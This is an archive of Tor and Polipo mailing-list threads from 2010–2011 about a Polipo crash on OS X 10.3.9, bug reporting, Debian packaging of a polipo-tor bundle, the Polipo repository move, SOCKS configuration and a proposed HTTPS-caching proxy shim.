[Geoff Down] [Polipo-users] Polipo crash (Vidalia Bundle) on OSX10.3.9

2011-02-10 Thread Juliusz Chroboczek
---BeginMessage---
Hello,
the Polipo in
https://www.torproject.org/dist/vidalia-bundles/vidalia-bundle-0.2.2.22-alpha-0.2.10-ppc.dmg
crashes on startup as follows:
dyld: /Applications/Vidalia.app.new/Contents/MacOS/polipo Undefined
symbols:
/Applications/Vidalia.app.new/Contents/MacOS/polipo undefined reference
to ___stderrp expected to be defined in /usr/lib/libSystem.B.dylib
/Applications/Vidalia.app.new/Contents/MacOS/polipo undefined reference
to ___stdoutp expected to be defined in /usr/lib/libSystem.B.dylib
Trace/BPT trap

 (This is a similar error message to that with which the Vidalia in that
 bundle crashes, even when Polipo is already running (an older version)
 and so Vidalia doesn't need to start it...)

Regards,
Geoff Down
PS I haven't joined the list, so please cc me in any reply.
***
To unsubscribe, send an e-mail to majord...@torproject.org with
unsubscribe or-talk in the body. http://archives.seul.org/or/talk/
---End Message---


Re: Polipo bug reporting

2011-01-31 Thread Andrew Lewman
On Mon, 31 Jan 2011 12:20:10 +
Geoff Down geoffd...@fastmail.net wrote:
  Thank you Juliusz, I appreciate your efforts.
 Clearly Tor needs to ship with a working Polipo, so if this is a real
 fault would the bundle developers please revert to the version which
 was in the Vidalia 0.2.9 bundle, which is still working.

The difference is that the PPC bundle with vidalia 0.2.9 was built on a
10.3.9 ppc mac.  However, the 10.3.9 machine died a smelly, melty
death during a build a few months ago. The current bundles are built on
a 10.5 ppc mac with backwards compatibility for 10.3.9 (at least
according to xcode/gcc).  

Clearly Apple's backwards compatibility options don't work.

-- 
Andrew
pgp 0x74ED336B


Re: Polipo bug reporting

2011-01-31 Thread Erinn Clark
* Andrew Lewman and...@torproject.org [2011:01:31 08:56 -0500]: 
 On Mon, 31 Jan 2011 12:20:10 +
 Geoff Down geoffd...@fastmail.net wrote:
   Thank you Juliusz, I appreciate your efforts.
  Clearly Tor needs to ship with a working Polipo, so if this is a real
  fault would the bundle developers please revert to the version which
  was in the Vidalia 0.2.9 bundle, which is still working.
 
 The difference is that the PPC bundle with vidalia 0.2.9 was built on a
 10.3.9 ppc mac.  However, the 10.3.9 machine died a smelly, melty
 death during a build a few months ago. The current bundles are built on
 a 10.5 ppc mac with backwards compatibility for 10.3.9 (at least
 according to xcode/gcc).  
 
 Clearly Apple's backwards compatibility options don't work.

They're built with backwards compatibility for 10.4. 10.3 is not supported at
this point, unless someone sends me a patch.




Re: Polipo bug reporting

2011-01-31 Thread Geoff Down


On Mon, 31 Jan 2011 08:56 -0500, Andrew Lewman and...@torproject.org
wrote:
 On Mon, 31 Jan 2011 12:20:10 +
 Geoff Down geoffd...@fastmail.net wrote:
   Thank you Juliusz, I appreciate your efforts.
  Clearly Tor needs to ship with a working Polipo, so if this is a real
  fault would the bundle developers please revert to the version which
  was in the Vidalia 0.2.9 bundle, which is still working.
 
 The difference is that the PPC bundle with vidalia 0.2.9 was built on a
 10.3.9 ppc mac.  However, the 10.3.9 machine died a smelly, melty
 death during a build a few months ago. 

Is nobody freecycling one? http://www.freecycle.org/group/US/
GD



Re: Polipo bug reporting

2011-01-31 Thread Aplin, Justin M

On 1/31/2011 7:58 PM, Geoff Down wrote:

  The difference is that the PPC bundle with vidalia 0.2.9 was built on a
  10.3.9 ppc mac.  However, the 10.3.9 machine died a smelly, melty
  death during a build a few months ago.

 Is nobody freecycling one? http://www.freecycle.org/group/US/
 GD


I may be wrong about this, but I believe it's more of a software issue 
than a hardware one. The last version of Xcode produced for 10.3 is 
known to produce some wonky, apparently random errors in some 
applications when they are run on 10.4 and 10.5. I imagine that 10.4 and 
above are much more prevalent on current live machines (although I'd 
love to see some hard data either way on that one), so given one 
dedicated PPC build machine I imagine the emphasis should be placed on 
producing stable applications for 10.4 and 10.5 (10.6 being Intel-only). 
Xcode for 10.5 is known to produce applications that play fairly nice 
with 10.4, but again, things sometimes get wonky with 10.3 (and then 
again, sometimes not).


That's not to say, of course, that if you happened to find an old mac 
and some 10.3 disks laying around, that a donation wouldn't be 
appreciated =)


~Justin Aplin



Re: Polipo bug reporting

2011-01-30 Thread Robert Ransom
On Sun, 30 Jan 2011 22:59:49 +
Geoff Down geoffd...@fastmail.net wrote:

 how do I report a bug with the Polipo in
 https://www.torproject.org/dist/vidalia-bundles/vidalia-bundle-0.2.2.22-alpha-0.2.10-ppc.dmg
 ?
 And how do I tell which version is in there also please?

If that bundle contains a CHANGES file for Polipo, the last entry in it
is for the included version of Polipo.  

 ( I saw http://archives.seul.org/or/talk/Jan-2011/msg00161.html but it
 doesn't specify where the new bugtracker is).

We do not know of any new bug tracker for Polipo.  If you have a bug
report for Polipo itself, report it to the polipo-users mailing list
(see https://lists.sourceforge.net/lists/listinfo/polipo-users).


Robert Ransom




Re: Polipo bug reporting

2011-01-30 Thread Geoff Down


On Sun, 30 Jan 2011 16:20 -0800, Robert Ransom
rransom.8...@gmail.com wrote:
 On Sun, 30 Jan 2011 22:59:49 +
 Geoff Down geoffd...@fastmail.net wrote:
 
  how do I report a bug with the Polipo in
  https://www.torproject.org/dist/vidalia-bundles/vidalia-bundle-0.2.2.22-alpha-0.2.10-ppc.dmg
  ?
  And how do I tell which version is in there also please?
 
 If that bundle contains a CHANGES file for Polipo, the last entry in it
 is for the included version of Polipo.  
 
  ( I saw http://archives.seul.org/or/talk/Jan-2011/msg00161.html but it
  doesn't specify where the new bugtracker is).
 
 We do not know of any new bug tracker for Polipo.  If you have a bug
 report for Polipo itself, report it to the polipo-users mailing list
 (see https://lists.sourceforge.net/lists/listinfo/polipo-users).
 
 
 Robert Ransom
 
Thank you.
There is a Changes.txt file in the .dmg, but it doesn't mention the
Polipo version number, it's mainly concerned with Vidalia changes.
I can't see any other file with 'Changes' or 'Version' in the name in
the .app folder, other than in the Quicktime section.
GD



Re: Polipo bug reporting

2011-01-30 Thread Juliusz Chroboczek
 ( I saw http://archives.seul.org/or/talk/Jan-2011/msg00161.html but it
 doesn't specify where the new bugtracker is).

 We do not know of any new bug tracker for Polipo.  If you have a bug
 report for Polipo itself, report it to the polipo-users mailing list
 (see https://lists.sourceforge.net/lists/listinfo/polipo-users).

Please note that Polipo is very short on manpower -- there's only me
working on it in my copious free time, and it's my nth project, for some
large value of n.  As Robert mentioned, you're welcome to report your
bug on the Polipo mailing list, but please don't expect a timely fix.

--Juliusz


Re: Polipo bug Re: Tor 0.2.2.21-alpha is out (security patches)

2011-01-21 Thread Geoff Down


On Fri, 21 Jan 2011 08:32 +0100, Erinn Clark er...@torproject.org
wrote:
 * Geoff Down geoffd...@fastmail.net [2011:01:20 12:56 +]: 
  The Polipo in
  https://www.torproject.org/dist/vidalia-bundles/vidalia-bundle-0.2.2.21-alpha-0.2.10-ppc-1.dmg
  is broken:
  
  dyld: /Applications/Vidalia.app.new/Contents/MacOS/polipo Undefined
  symbols:
  /Applications/Vidalia.app.new/Contents/MacOS/polipo undefined reference
  to ___stderrp expected to be defined in /usr/lib/libSystem.B.dylib
  /Applications/Vidalia.app.new/Contents/MacOS/polipo undefined reference
  to ___stdoutp expected to be defined in /usr/lib/libSystem.B.dylib
  Trace/BPT trap
 
 Hi Geoff,
 
 Which version of OS X are you using?
 
Hi Erinn,
10.3.9
GD



Polipo bug Re: Tor 0.2.2.21-alpha is out (security patches)

2011-01-20 Thread Geoff Down


On Tue, 18 Jan 2011 22:11 -0500, Roger Dingledine a...@mit.edu
wrote:
 Tor 0.2.2.21-alpha includes all the patches from Tor 0.2.1.29, which
 continues our recent code security audit work. The main fix resolves
 a remote heap overflow vulnerability that can allow remote code
 execution (CVE-2011-0427). Other fixes address a variety of assert
 and crash bugs, most of which we think are hard to exploit remotely.
 
 All Tor users should upgrade.

The Polipo in
https://www.torproject.org/dist/vidalia-bundles/vidalia-bundle-0.2.2.21-alpha-0.2.10-ppc-1.dmg
is broken:

dyld: /Applications/Vidalia.app.new/Contents/MacOS/polipo Undefined
symbols:
/Applications/Vidalia.app.new/Contents/MacOS/polipo undefined reference
to ___stderrp expected to be defined in /usr/lib/libSystem.B.dylib
/Applications/Vidalia.app.new/Contents/MacOS/polipo undefined reference
to ___stdoutp expected to be defined in /usr/lib/libSystem.B.dylib
Trace/BPT trap

(I renamed the app folder - the old version is working fine with the new
Tor binary).
GD



Re: Polipo bug Re: Tor 0.2.2.21-alpha is out (security patches)

2011-01-20 Thread Erinn Clark
* Geoff Down geoffd...@fastmail.net [2011:01:20 12:56 +]: 
 The Polipo in
 https://www.torproject.org/dist/vidalia-bundles/vidalia-bundle-0.2.2.21-alpha-0.2.10-ppc-1.dmg
 is broken:
 
 dyld: /Applications/Vidalia.app.new/Contents/MacOS/polipo Undefined
 symbols:
 /Applications/Vidalia.app.new/Contents/MacOS/polipo undefined reference
 to ___stderrp expected to be defined in /usr/lib/libSystem.B.dylib
 /Applications/Vidalia.app.new/Contents/MacOS/polipo undefined reference
 to ___stdoutp expected to be defined in /usr/lib/libSystem.B.dylib
 Trace/BPT trap

Hi Geoff,

Which version of OS X are you using?




Re: Polipo starts on bootup

2011-01-19 Thread kuhkatz

On 19.01.2011 03:27, andr...@fastmail.fm wrote:

 I'm using Ubuntu 10.04 and have the Tor browser bundle installed.

 After Ubuntu boots up and I try to start Tor I find that Tor won't
 start.  I found that Polipo is running so I did a Pidof polipo and then
 a sudo kill  (for the polipo process number).

 Is there any reason I should have Polipo on my machine at all and,
 secondly, is there any risk in Polipo starting at bootup?

AFAIK:
tor project patched the firefox included in TBB so it doesn't need polipo.
so, if you use the browser bundle, you don't need it,
but i am not aware of any dangers if it exists - it just doesn't get used.

 Should I just delete Polipo off my computer?

if you don't use it otherwise than for tor (and then it's only needed if 
you also installed tor, and not use the bundle) you should be ok with 
deleting it.



Re: Polipo starts on bootup

2011-01-19 Thread Mary Escondido
Hi Andre,

having polipo running should not prevent tor from running.
What messages did tor emit when it failed to start?
polipo is useful as a http proxy (which tor is not).
typically, you would set your system-wide http-proxy
environment variable to point to polipo, and configure
polipo to use the local tor.

-Mary

--- On Wed, 1/19/11, andr...@fastmail.fm andr...@fastmail.fm wrote:

 From: andr...@fastmail.fm andr...@fastmail.fm
 Subject: Polipo starts on bootup
 To: or-talk@freehaven.net
 Date: Wednesday, January 19, 2011, 2:27 AM
 I'm using Ubuntu 10.04 and have the Tor browser bundle installed.
 
 After Ubuntu boots up and I try to start Tor I find that Tor won't
 start.  I found that Polipo is running so I did a Pidof polipo and then
 a sudo kill  (for the polipo process number).
 
 Is there any reason I should have Polipo on my machine at all and,
 secondly, is there any risk in Polipo starting at bootup?
 
 Should I just delete Polipo off my computer?






Re: Polipo starts on bootup

2011-01-19 Thread Dirk
andr...@fastmail.fm wrote:
 I'm using Ubuntu 10.04 and have the Tor browser bundle installed.
 
 After Ubuntu boots up and I try to start Tor I find that Tor won't
 start.  I found that Polipo is running so I did a Pidof polipo and then
 a sudo kill  (for the polipo process number).
 
 Is there any reason I should have Polipo on my machine at all and,
 secondly, is there any risk in Polipo starting at bootup?
 
 Should I just delete Polipo off my computer?
 

afaik polipo is some proxy.. just like privoxy it can be used to invoke TOR...
i think it is a little bit smaller than privoxy or so.. here is a small howto...
http://www.pps.jussieu.fr/~jch/software/polipo/tor.html

i just use torify to start processes that should make use of tor... mostly
cronjobs.. but that's my setup..


Dirk


Polipo starts on bootup

2011-01-18 Thread andre76
I'm using Ubuntu 10.04 and have the Tor browser bundle installed.

After Ubuntu boots up and I try to start Tor I find that Tor won't
start.  I found that Polipo is running so I did a Pidof polipo and then
a sudo kill  (for the polipo process number).

Is there any reason I should have Polipo on my machine at all and,
secondly, is there any risk in Polipo starting at bootup?

Should I just delete Polipo off my computer?



Re: polipo-tor deb/ubuntu native package

2011-01-17 Thread travis+ml-tor-talk
On Thu, Jan 13, 2011 at 12:03:58AM -0500, and...@torproject.org wrote:
 On Fri, Jan 07, 2011 at 03:21:22PM -0800, 
 travis+ml-tor-t...@subspacefield.org wrote 15K bytes in 259 lines about:
 There has been much discussion over a combined tor and polipo package,
 as well as a vidalia-tor-polipo package for deb-based systems.  

Well, I just saw the vidalia ubuntu packages lately, and I think I'll
make it a recommended package for my polipo-tor package, since vidalia
doesn't seem apropos for headless servers, for example (I could be
wrong; only installed it recently).

 The core issue is that packages should not overwrite other packages
 config files.

I don't; I just installed to parallel files such as /etc/polipo-tor.

In other words, it installs polipo, tor, and a bunch of other
dependencies, and then installs a parallel set of config files,
/var/run pid files, and log files so that it doesn't interfere with
the installed polipo.  It also runs on a different port (8118 instead
of polipo's default of 8123).

To make it ridiculously easy for people, I created my own repo here:

http://www.subspacefield.org/packages/ubuntu/

Just follow the instructions, sudo aptitude install polipo-tor,
install torbutton (or whatever), and go.  Should take all of one
minute to get up and running.

 We've generally assumed (wrongly) that linux users
 understand their system and can handle manual configuration of a few
 packages, such as tor, polipo, and vidalia.  The general answer for
 users who just want a tor client is to use the tor browser bundle.

I understand; I'm old school, I used to track all third-party sources
via CVS, but it just doesn't scale very well.  Nowadays if it's not in
a repo, it doesn't exist for most people - it's beyond their
level of interest.  I understand both points of view.

 The real answer is to fix firefox so it doesn't need a proxy between it
 and Tor.  We patch firefox to do just this in the osx and linux tor
 browser bundles.  Polipo was a fine kludge until either we started
 patching firefox or mozilla fixed their many-years-old socks bug.

Hmm, I had no idea this was even available for Linux.

It looks like a tarball - it's unclear how this will interact with a
package manager, which likes to know which packages installed which
files, and updates them automatically, etc.

 The great thing about free software is that you're welcome to do just
 what you're doing.  You don't like the situation, so you solve it.
 Great.

Thanks. ;-)  I believe in do-ocracy.

So, now I've brought the level of effort down to one minute or less,
and the level of thought down to something you can do while drunk and
sleep-deprived, since there's no decisions required.

So how do I make people aware of the option?
-- 
Effing the ineffable since 1997. | http://www.subspacefield.org/~travis/
My emails do not usually have attachments; it's a digital signature
that your mail program doesn't understand.
If you are a spammer, please email j...@subspacefield.org to get blacklisted.




Re: polipo-tor deb/ubuntu native package

2011-01-17 Thread intrigeri
Hi,

travis+ml-tor-t...@subspacefield.org wrote (17 Jan 2011 20:21:56 GMT) :
 So, now I've brought the level of effort down to one minute or less,
 and the level of thought down to something you can do while drunk
 and sleep-deprived, since there's no decisions required.

Thank you. This is much appreciated.

 So how do I make people aware of the option?

In my humble opinion your package shall be pushed to Debian and Ubuntu
(or at least to deb.torproject.org) before user awareness is the top
priority. Rationale: I'm not a fan of recommending users to install
.deb from any random online repository (no offense intended); trusting
a given APT source almost equals trusting this repository's admins and
package maintainers to be root on your system.

I don't think pushing this package to Debian and Ubuntu is that hard
and I suggest the following process:

0. If not done yet, compare the default polipo configuration you are
   shipping with the Tor Browser Bundle's and T(A)ILS' ones, just to
   make sure no privacy/anonymity-related option was missed.
1. Make sure your package is in good enough shape so that it can be
   included in Debian (= Debian users can use it as well, and Ubuntu
   will fetch it from there in a few months). I mean checking the
   Debian Policy compliance, making sure it is Lintian-clean, etc.
2. Fill a Request For Package (RFP) bug in the Debian BTS [0] so that
   any Tor-friendly Debian developer is aware of your work and can
   decide to upload your package into Debian.
3. Mention the RFP bug on the Debian bug that tracks the polipo vs.
   torbutton port mismatch [1], and reciprocally.
4. Wait for the package to be uploaded into Debian.
5. Wait for the package to be fetched from Debian by Ubuntu.

Note that one does not need to be an official Debian developer to
maintain packages in Debian. Such a formal status is only needed to
upload, so you can go on maintaining this package and work hand in
hand with a Debian developer that will advise you if needed, check
your packages and push it to the Debian archive (... = Ubuntu
archive).

[0] http://www.debian.org/devel/wnpp/
[1] http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=606916

Bye,
--
  intrigeri intrig...@boum.org
  | GnuPG key @ https://gaffer.ptitcanardnoir.org/intrigeri/intrigeri.asc
  | OTR fingerprint @ https://gaffer.ptitcanardnoir.org/intrigeri/otr.asc
  | Every now and then I get a little bit restless
  | and I dream of something wild.


Re: polipo-tor deb/ubuntu native package

2011-01-17 Thread travis+ml-tor-talk
On Mon, Jan 17, 2011 at 10:42:18PM +0100, intrigeri wrote:
  So how do I make people aware of the option?
 
 In my humble opinion your package shall be pushed to Debian and Ubuntu
 (or at least to deb.torproject.org) before user awareness is the top
 priority. Rationale: I'm not a fan of recommending users to install
 .deb from any random online repository (no offense intended); trusting
 a given APT source almost equals trusting this repository's admins and
 package maintainers to be root on your system.

Makes sense.

I'd like to get it in the torproject.org repo, but I'm not sure how.

Per Andrew's suggestion, I opened a trac.torproject.org ticket to
ask for someone to help me get it in there.

I am unsure of whether it should be in the debian repo, since the
dependencies aren't even in there yet.  However, I could try and
see what they think.

 I don't think pushing this package to Debian and Ubuntu is that hard
 and I suggest the following process:
 
 0. If not done yet, compare the default polipo configuration you are
    shipping with the Tor Browser Bundle's and T(A)ILS' ones, just to
    make sure no privacy/anonymity-related option was missed.

Good point, will do.

 1. Make sure your package is in good enough shape so that it can be
    included in Debian (= Debian users can use it as well, and Ubuntu
    will fetch it from there in a few months). I mean checking the
    Debian Policy compliance, making sure it is Lintian-clean, etc.

I uploaded it to debian-mentors and it checks out fine now (as of
version 1.4)

 2. Fill a Request For Package (RFP) bug in the Debian BTS [0] so that
    any Tor-friendly Debian developer is aware of your work and can
    decide to upload your package into Debian.

Is this related, parallel, a superset or a subset of the
debian-mentors RFS process?  I could go through that, but haven't
flagged this package as needing sponsorship yet since the tor
packages themselves aren't in the debian repo.

-- 
Effing the ineffable since 1997. | http://www.subspacefield.org/~travis/
My emails do not usually have attachments; it's a digital signature
that your mail program doesn't understand.
If you are a spammer, please email j...@subspacefield.org to get blacklisted.




Re: polipo-tor deb/ubuntu native package

2011-01-17 Thread Andrew Lewman
On Mon, 17 Jan 2011 12:21:56 -0800
travis+ml-tor-t...@subspacefield.org wrote:
  The real answer is to fix firefox so it doesn't need a proxy
  between it and Tor.  We patch firefox to do just this in the osx
  and linux tor browser bundles.  Polipo was a fine kludge until
  either we started patching firefox or mozilla fixed their
  many-years-old socks bug.
 
 Hmm, I had no idea this was even available for Linux.
 
 It looks like a tarball - it's unclear how this will interact with a
 package manager, which likes to know which packages installed which
 files, and updates them automatically, etc.

Tor Browser Bundle isn't something to install, you extract and run.
I've seen a few linux users just double click the tar.gz file and run
from inside their archive extractor.

-- 
Andrew
pgp 0x74ED336B


Re: polipo-tor deb/ubuntu native package

2011-01-17 Thread intrigeri
Hi,

travis+ml-tor-t...@subspacefield.org wrote (17 Jan 2011 23:55:16 GMT) :

 I am unsure of whether it should be in the debian repo, since the
 dependencies aren't even in there yet.

What are the missing dependencies? (I have not had a single look at
your package yet, sorry.)

 However, I could try and see what they think.

From my (limited) experience, this is not a process that works very
well inside the Debian community. Things are changing though, but the
process is slow. What works better, as far as I know, is preparing
things really well before submission so that your proposal cannot be
rejected for obvious minor reasons: the first impression it makes is
pretty important.

 I uploaded it to debian-mentors and it checks out fine now (as of
 version 1.4)

Congrats :)

 2. Fill a Request For Package (RFP) bug in the Debian BTS [0] so that
    any Tor-friendly Debian developer is aware of your work and can
    decide to upload your package into Debian.

 Is this related, parallel, a superset or a subset of the
 debian-mentors RFS process?

I don't know the Debian Mentors process at all, sorry.

 I could go through that, but haven't flagged this package as needing
 sponsorship yet since the tor packages themselves aren't in the
 debian repo.

You might be confusing Debian and Ubuntu on this matter as Tor has
been part of Debian for years:

  - http://packages.debian.org/changelogs/pool/main/t/tor/current/changelog
  - http://snapshot.debian.org/package/tor/

Moreover the Tor package will closely follow upstream releases during
the Debian Squeeze lifecycle, thanks to the Debian Volatile archive.

Bye,
--
  intrigeri intrig...@boum.org
  | GnuPG key @ https://gaffer.ptitcanardnoir.org/intrigeri/intrigeri.asc
  | OTR fingerprint @ https://gaffer.ptitcanardnoir.org/intrigeri/otr.asc
  | We're dreaming of something else.
  | Something more clandestine, something happier.


[Polipo-users] Polipo moved back to PPS

2011-01-12 Thread Juliusz Chroboczek
---BeginMessage---
Dear all,

I've just moved the Polipo repository back to PPS.  In order to get the
upstream Polipo sources, you now need to do

  git clone git://git.wifi.pps.jussieu.fr/polipo

My branch is called ``master''; Chris's old branch is called
``polipo-chrisd'', and his last tree is tagged ``polipo-chrisd-20100330''.
Note that master has moved around; unless you fully understand what that
implies, I suggest you just clone yourself a new copy.

I'll be cherry picking the more reasonable of Chris's changes over the
next days, at which point I'll start working on getting 1.0.5 out the
door.  If you have any useful patches that fell into the cracks, next
week should be a good time to rebase them and send them again.

Tor folks -- would you be so kind as to remove the Polipo repository
from git.torproject.org, remove the Polipo project from Tor's bug
tracker, and make any mentions of Polipo in the tor wiki point at the
new location?

Thanks to all for your patience,

Juliusz


Polipo-users mailing list
polipo-us...@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/polipo-users
---End Message---


Re: [Polipo-users] Polipo moved back to PPS

2011-01-12 Thread grarpamp
 git clone git://git.wifi.pps.jussieu.fr/polipo

Do you have a gitweb? That would be nice.

 Chris's old branch is called polipo-chrisd

Oh, meaning 'chrisd/polipo' @ 20100113
193d95e3906967433081e0b10626a67c075ac131

 and his last tree is tagged ``polipo-chrisd-20100330''.

Oh, meaning 'polipo' @ 20100330
b92db574c11961f681fa258314bd7470e4449cc0
This latter tree seeming to be seeded from the
former when development there stopped.
This commit compiles and runs fine on FreeBSD 8.1 i386 :)


polipo-tor deb/ubuntu native package

2011-01-07 Thread travis+ml-tor-talk
Attached.

I'm gonna make this available on a personal repo in the near future
(this weekend or next)... the tools are kinda wonky.

All architectures - no binaries - has a proper list of dependencies I
think, though I should add vidalia and make some of them optional
probably.

I've advertised this a few times, to virtually no response.  The
tor-assistants mlist has been confused, with people telling me they
weren't sure what their ubuntu strategy was, whether they even wanted
debian packages, etc.

I haven't, for the life of me, been able to even figure out who to
talk to.  I've posted emails perhaps 3 times, with virtually no
feedback.  Nobody's apparently doing anything.  I don't blame them,
because the debian packaging tools and docs are complicated and
annoying.

So, I'm just publishing this myself.

If you apt-get this from a repo, it'll install every package you
need, IIUC.

Then install torbutton, one click and you're on tor.
-- 
Good code works on most inputs; correct code works on all inputs.
My emails do not have attachments; it's a digital signature that your mail
program doesn't understand. | http://www.subspacefield.org/~travis/ 
If you are a spammer, please email j...@subspacefield.org to get blacklisted.


polipo-tor_1.3_all.deb
Description: application/debian-package




Polipo and privoxy needed?

2010-12-23 Thread .
I just upgraded my Tor setup with the Browser Bundle.  It runs fine but
I noticed that I have privoxy and polipo still on my system from the old
setup.

Can I delete them?





Re: Polipo and privoxy needed?

2010-12-23 Thread andrew
On Thu, Dec 23, 2010 at 09:26:17AM -0500, pe...@aleksandrsolzhenitsyn.net wrote 
1.4K bytes in 34 lines about:
: I just upgraded my Tor setup with the Browser Bundle.  It runs fine but
: I noticed that I have privoxy and polipo still on my system from the old
: setup.
: 
: Can I delete them?

If you are using TBB, then yes, you can remove privoxy/polipo installed
on your system.


-- 
Andrew
pgp key: 0x74ED336B


SOCKS 4a or SOCKS 5 when using Polipo?

2010-11-21 Thread Matthew

 Hello,

According to the Tor manual 
(https://trac.torproject.org/projects/tor/wiki/TheOnionRouter/TorFAQ#IkeepseeingthesewarningsaboutSOCKSandDNSandinformationleaks.ShouldIworry) 
one should use SOCKS 4a.


AIUI, Polipo or Privoxy are used as HTTP proxies which then allow the 
client (Firefox) to speak to Tor as SOCKS 4a (therefore providing 
hostnames rather than already resolved IP addresses as with SOCKS 4 or 5).


I therefore do not understand why in the Tor version of the Polipo 
configuration file 
(https://gitweb.torproject.org/torbrowser.git/blob_plain/HEAD:/build-scripts/config/polipo.conf) 
it says:


# Uncomment this if you want to use a parent SOCKS proxy:

socksParentProxy = localhost:9050
socksProxyType = socks5

I am going to assume that the need to use a HTTP proxy no longer exists and 
Firefox used as a SOCKS 5 client allows Tor to do DNS resolutions 
remotely?  Could someone please explain or confirm this?


Many thanks.
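The distinction asked about above, shown on the wire: this added example (not part of the original post, and not Tor or Polipo code) builds SOCKS4, SOCKS4a and SOCKS5 CONNECT requests and classifies a captured request by whether it carries a hostname or an already-resolved address. The targets (`example.com`, `192.0.2.10`) and all function names are constructed for illustration.

```python
"""Added example: does a SOCKS request carry a hostname or a resolved address?"""
import ipaddress
import struct


def build_socks4(ip, port, user=b""):
    # VN=4, CD=1 (CONNECT), DSTPORT, DSTIP, USERID, NUL
    return (struct.pack("!BBH", 4, 1, port)
            + ipaddress.IPv4Address(ip).packed + user + b"\x00")


def build_socks4a(host, port, user=b""):
    # Same header, but DSTIP is 0.0.0.x (x != 0) and the hostname follows USERID.
    return (struct.pack("!BBH", 4, 1, port) + b"\x00\x00\x00\x01"
            + user + b"\x00" + host.encode("ascii") + b"\x00")


def build_socks5(target, port):
    # VER=5, CMD=1 (CONNECT), RSV=0, ATYP, DST.ADDR, DST.PORT
    try:
        addr = ipaddress.ip_address(target)
    except ValueError:
        name = target.encode("ascii")
        body = b"\x03" + bytes([len(name)]) + name      # ATYP 3: domain name
    else:
        body = (b"\x01" if addr.version == 4 else b"\x04") + addr.packed
    return b"\x05\x01\x00" + body + struct.pack("!H", port)


def _result(protocol, target, port, resolved_by):
    return {"protocol": protocol, "target": target,
            "port": port, "resolved_by": resolved_by}


def classify(req):
    """Parse one SOCKS CONNECT request (not the SOCKS5 method greeting).

    resolved_by is "proxy" when the request carries a hostname, and "client"
    when the client looked the name up itself and sent only an address.
    """
    if len(req) < 2:
        raise ValueError("truncated request")
    if req[0] == 4:
        if len(req) < 9:
            raise ValueError("truncated SOCKS4 request")
        port = struct.unpack("!H", req[2:4])[0]
        ip = req[4:8]
        fields = req[8:].split(b"\x00")   # [userid, hostname, b""] for 4a
        if ip[:3] == b"\x00\x00\x00" and ip[3] != 0:
            if len(fields) < 3 or not fields[1]:
                raise ValueError("SOCKS4a request without hostname")
            return _result("SOCKS4a", fields[1].decode("ascii"), port, "proxy")
        return _result("SOCKS4", str(ipaddress.IPv4Address(ip)), port, "client")
    if req[0] == 5:
        if len(req) < 5:
            raise ValueError("truncated SOCKS5 request")
        atyp = req[3]
        if atyp == 1:
            off, addr_len = 4, 4
        elif atyp == 4:
            off, addr_len = 4, 16
        elif atyp == 3:
            off, addr_len = 5, req[4]     # one length byte, then the name
        else:
            raise ValueError("unknown ATYP %d" % atyp)
        end = off + addr_len
        if len(req) < end + 2:
            raise ValueError("truncated SOCKS5 request")
        port = struct.unpack("!H", req[end:end + 2])[0]
        raw = req[off:end]
        if atyp == 3:
            return _result("SOCKS5", raw.decode("ascii"), port, "proxy")
        return _result("SOCKS5", str(ipaddress.ip_address(raw)), port, "client")
    raise ValueError("not a SOCKS4/4a/5 request")


def locally_resolved(requests):
    """Return the parsed requests whose name lookup happened on the client."""
    parsed = [classify(r) for r in requests]
    return [p for p in parsed if p["resolved_by"] == "client"]


# Constructed sample capture: four requests a local SOCKS listener might receive.
SAMPLES = [
    build_socks4("192.0.2.10", 80),
    build_socks4a("example.com", 80),
    build_socks5("example.com", 443),
    build_socks5("192.0.2.10", 443),
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(classify(sample))
```

A SOCKS5 request is only as safe as its address type: the same protocol version appears once with a hostname and once with a bare address in the sample capture.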


Re: https proxy [was polipo]

2010-08-23 Thread Julie C
On Sat, Aug 21, 2010 at 6:18 PM, grarpamp grarp...@gmail.com wrote:


 Nothing in the open source field can do so yet afaik.

 To do it, a shim needs to be coded and placed between the application and
 Tor.
 user - browser - [optional tool] - shim - tor:9050

 The shim needs to listen on a proxy port (and or two configurable
 ports (for http and https)) and connect out to the world (or tor) to a
 proxy port (socks) (and or
 two other ports (for http and https or whatever port the input protocol
 used)).

 It would pass http unmodified.
 It would break end to end https. If the destination site had an invalid
 cert,
 it would present an invalid self-generated one to the client. If the
 destination
 site had a valid cert, it would present a self-generated and self-signed
 one to
 the client (which had obviously included the shim's root as a trusted
 cert), simply
 to signify to the client as to validity. Identity would be available
 from verbose
 logging in the shim and via an http[s] port on the shim itself.

 It could furthermore 'tee' off two output ports from its bottom and
 receive
 two input ports from its top. These would be a more general hook into
 'optional toolchains' located in between the client and server side,
 decoding and shuffling the data stream in and out to a toolset at that
 point.

 It should have no 'censoring', caching or other features.. as that is what
 the optional toolsets do best.

 Note that 'browser' could be anything that can speak http[s], not
 just FF/MSIE. So 'plugins' are a non option.


Very interesting idea. I am considering attempting this in an upcoming
practicum term at school starting in January 2011.

I wonder if you could help me a bit further by providing a list of
advantages this shim would/could provide. I can see it could provide some
protection against ssl/ssh mitm attacks. It could better protect the
browser (or other app) by moving some of the ssl/tls/cert logic out to an
open source proxy of sorts. It could better protect users against
ssl/tls/cert vulnerabilities in both open source and proprietary apps.

But I confess to not being sufficiently capable yet on this issue, so any
input by any other readers here would be greatly appreciated.

--
Julie


Re: https proxy [was polipo]

2010-08-23 Thread morphium
 I can see it could provide some
 protection against ssl/ssh mitm attacks.

No. Why do you think it could?

 It could better protect the
 browser (or other app) by moving some of the ssl/tls/cert logic out to an
 open source proxy of sorts.

Protect? Of what? How?

 It could better protect users against
 ssl/tls/cert vulnerabilities in both open source and proprietary apps.

Explain, please

Best regards, morphium


Re: polipo

2010-08-23 Thread Juliusz Chroboczek
 For the most part, anything involving HTTPS, needs to be taken care of in
 the browser itself.

My personal opinion (and I'm the author of Polipo) is that all content
munging should be done in the browser -- munging in the proxy is
a broken design.  Unfortunately, the browser vendors care more about
functionality than privacy.

 Properly-configured extensions help a lot here.

I'd rather see privacy features in the browser core, not slapped-on as
extensions.

Juliusz


Re: https proxy [was polipo]

2010-08-23 Thread grarpamp
 I can see it could provide some protection against...
 No. Why do you think it could?
  - because by default - lots of additional reasons...

The shim was just supposed to be a tool so you could hook into
an http[s] stream and do whatever with it, or nothing at all.
For instance, I've always wanted to cache static images and
pages coming in over https via Tor/Inet. Can't do that yet.

Throw this shim between your browser and your gateway,
tee it off into squid and you could save some significant
bandwidth.

With https becoming ever more popular and likely to be
